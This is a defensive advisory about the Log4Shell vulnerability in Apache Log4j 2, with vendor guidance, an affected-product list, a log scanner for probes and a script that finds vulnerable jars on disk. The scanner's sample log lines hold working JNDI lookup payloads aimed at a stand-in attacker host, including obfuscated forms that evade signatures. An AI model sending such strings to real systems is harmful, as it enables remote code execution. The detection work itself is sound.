Last week a vulnerability (CVE-2021-44228, also known as Log4Shell) was published in Apache Log4j 2, a Java-based logging framework. It leads to unauthenticated remote code execution (RCE) and is trivial to trigger: an attacker sends a specially crafted string (a JNDI lookup of the form ${jndi:ldap://attacker-host/...}) in any input that a vulnerable Java application ends up writing to its log, for example a User-Agent header, a login name or a search field.
At the moment the internet is being mass-scanned for hosts with any web service exposed that could potentially be exploited. Our firewall vendors already have IPS signatures available that detect and drop this exploit; an example is shown below:
Make sure your firewall has the latest IPS signature database downloaded and that IPS is enabled on every inbound firewall rule for internet-facing hosts, not only ports 80 and 443: any exposed service that passes input to a Java application is a possible entry point. Treat IPS as a stopgap, not a fix. Attackers obfuscate the string (nested lookups, URL encoding) to slip past literal signatures, so the real remediation is upgrading the affected log4j-core to a fixed release, or removing the JndiLookup class from the jar, as described in the vendor guidance below. Blocking outbound LDAP and RMI connections from servers limits the damage in the meantime.
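As an added illustration (not code from the original post, nor any vendor's signature), the following Python checks constructed web-server log lines for the lookup string and shows why a literal signature match is not enough: the same payload can arrive URL-encoded or assembled from nested lookups (${lower:j}, ${::-j}, ${env:X:-j}), which log4j resolves before performing the JNDI lookup. The log lines, hostnames and IP addresses are made up; the set of obfuscation forms handled is the common ones, not an exhaustive list.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in access logs, including
obfuscated forms. Constructed example for this advisory; the log lines
below are made up (Apache combined log format)."""
import re
import urllib.parse

# Constructed sample: line 0 and line 5 are benign, lines 1-4 carry a
# probe in the User-Agent or the query string in progressively harder forms.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [13/Dec/2021:10:01:12 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${env:NOPE:-r}mi://attacker.example/a}"',
    '10.0.0.7 - - [13/Dec/2021:10:02:00 +0000] "GET /docs/${version} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

# ${lower:x} / ${upper:x} resolve to x (case does not matter for the final
# match, which is case-insensitive).
_LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${anything:...:-default} resolves to "default" when the lookup fails,
# which is how ${::-j} and ${env:NOPE:-j} spell the letter j.
_DEFAULT_VALUE = re.compile(r"\$\{[^{}:]*:(?:[^{}:]*:)*-([^{}]*)\}")
# What the signature is really looking for once the noise is removed.
_JNDI = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns|iiop|corba|nds|http):", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL-encoding and collapse nested lookups to their literal text.

    Both steps iterate because payloads are often double-encoded and
    lookups can be nested several levels deep.
    """
    for _ in range(3):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        reduced = _LOWER_UPPER.sub(lambda m: m.group(1), text)
        reduced = _DEFAULT_VALUE.sub(lambda m: m.group(1), reduced)
        if reduced == text:
            break
        text = reduced
    return text


def is_log4shell_probe(line):
    """True if the line contains a JNDI lookup after normalization."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Indexes of lines that carry a probe (normalized match)."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


def naive_scan(lines):
    """Indexes matched by a plain substring check, as a literal signature would."""
    return [i for i, line in enumerate(lines) if "${jndi:" in line.lower()]


if __name__ == "__main__":
    print("literal match hits:   ", naive_scan(SAMPLE_LOG))
    print("normalized match hits:", scan(SAMPLE_LOG))
    for i in scan(SAMPLE_LOG):
        print(i, normalize(SAMPLE_LOG[i]))
```

Run against your own access logs with scan(open(path).read().splitlines()); the gap between naive_scan and scan on the sample is exactly the gap between a literal IPS signature and what the application will actually resolve. Note that line 5 (a harmless ${version} in a URL) is not flagged, but any ${ reaching a Java application is worth a second look.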
Our firewall vendors have the following guidelines available:
- Palo Alto Networks: https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
- Fortinet: https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability
- Barracuda Networks: https://campus.barracuda.com/news/item/2AK9N
Below is a list of our vendor products that are possibly affected by this vulnerability. We have excluded SaaS solutions from the list, as patching those is the vendor's responsibility:
- Alcatel-Lucent Enterprise OmniSwitch / Stellar / OmniVista: not affected: https://www.al-enterprise.com//en/-/media/assets/internet/documents/n-to-s/sa-c00068ed3-en.pdf
- Barracuda CloudGen Firewall: not affected: https://campus.barracuda.com/news/item/2AK9N
- Barracuda Web Application Firewall: not affected: https://campus.barracuda.com/product/webapplicationfirewall/doc/96024300/apache-log4j-critical-vulnerability-cve-2021-44228/
- Barracuda Sentinel, VPN client, Cloud Services: unknown
- Fortinet FortiGate: not affected: https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability
- Palo Alto Networks
- Trend Micro OfficeScan / Apex One / Worry-Free: not affected: https://success.trendmicro.com/solution/000289940
Tip: use a Canarytoken to help detect CVE-2021-44228 in your own applications: https://help.canary.tools/hc/en-gb/articles/4413465229201-Using-a-Canarytoken-to-help-test-for-CVE-2021-44228-log4j-log4shell-
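The list above covers vendor products. For Java applications you run yourself you have to find the library on disk, and it is frequently buried inside a .war, .ear or fat jar rather than sitting as a loose log4j-core-2.x.jar. The following is an added example written for this advisory, not code from the page, from Apache or from any vendor listed: it walks a directory tree, opens every jar/war/ear, recurses into nested archives, reads the version from log4j-core's Maven pom.properties (the standard Maven layout; an assumption for jars that were repackaged by hand) and reports whether JndiLookup.class is still present. The directory tree scanned by demo() is constructed in a temporary directory with fake jars, so it runs offline.

```python
"""Inventory log4j-core on disk, including inside nested archives, and flag
the CVE-2021-44228 range. Constructed example for this advisory; the fixture
built by build_fixture() is fake and only mimics the jar layout."""
import io
import os
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Standard Maven layout inside a log4j-core jar (assumption: not repackaged).
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def _version_from_pom(zf):
    try:
        data = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in data.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def vulnerable_to_44228(version):
    """True for log4j-core 2.x before 2.15.0 (the Apache advisory lists
    2.0-beta9 through 2.14.1); None when the version is unknown or odd.
    Combine with the JndiLookup presence check: no class, no lookup."""
    if version is None:
        return None
    parts = version.split("-")[0].split(".")
    try:
        major, minor = int(parts[0]), int(parts[1])
    except (ValueError, IndexError):
        return None
    return major == 2 and minor < 15


def inspect_archive(zf, path):
    """Yield (path, version, jndi_present) for each log4j-core found in zf,
    descending into archives nested inside it (WEB-INF/lib, fat jars)."""
    names = set(zf.namelist())
    if JNDI_LOOKUP in names or POM_PROPS in names:
        yield (path, _version_from_pom(zf), JNDI_LOOKUP in names)
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            yield from inspect_archive(inner, f"{path}!/{name}")


def scan_tree(root):
    """Walk root and return sorted (path, version, jndi_present) findings."""
    results = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if not f.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, f)
            try:
                with zipfile.ZipFile(full) as zf:
                    results.extend(inspect_archive(zf, full))
            except zipfile.BadZipFile:
                continue
    return sorted(results)


def build_fixture(root):
    """Constructed test tree: a 2.14.1 jar nested in a war (vulnerable) and a
    loose jar whose JndiLookup class has been removed (not exploitable)."""
    def make_jar(version, with_jndi):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            if with_jndi:
                zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # fake class bytes
        return buf.getvalue()
    os.makedirs(os.path.join(root, "webapps"), exist_ok=True)
    with zipfile.ZipFile(os.path.join(root, "webapps", "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", make_jar("2.14.1", True))
    with open(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), "wb") as fh:
        fh.write(make_jar("2.14.1", False))


def demo():
    """Scan the constructed fixture; returns (relative path, version,
    jndi_present, exploitable) per finding."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return [(os.path.relpath(p, root), v, j, bool(vulnerable_to_44228(v)) and j)
                for p, v, j in scan_tree(root)]


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

To check a real host, call scan_tree("/") or scan_tree("/opt") and treat every finding with jndi_present True and a version below 2.15.0 as exploitable; a finding with the class removed shows up as not exploitable, which is what the "delete JndiLookup.class from the jar" mitigation looks like on disk.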